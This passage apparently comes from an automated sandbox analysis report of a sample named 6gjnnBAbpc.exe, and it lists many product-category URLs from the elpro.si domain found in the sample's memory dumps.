                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-storitve/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/fiksni-detektorji-wireless/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/fiksni-detektorji-wireless/nadzorne-enote-fiksni-detektorji-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/hladilniki-za
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/ssr-rele-polp
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/tiristorski-r
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/dodatna-oprema-za-ind
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijske-tablice/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-telefoni
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/fiksni-infrardeci-ir-merilniki-tempe
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/kalibracijska-oprema-crno-telo-black
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/merilni-sistemi-za-temperaturo-calex
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 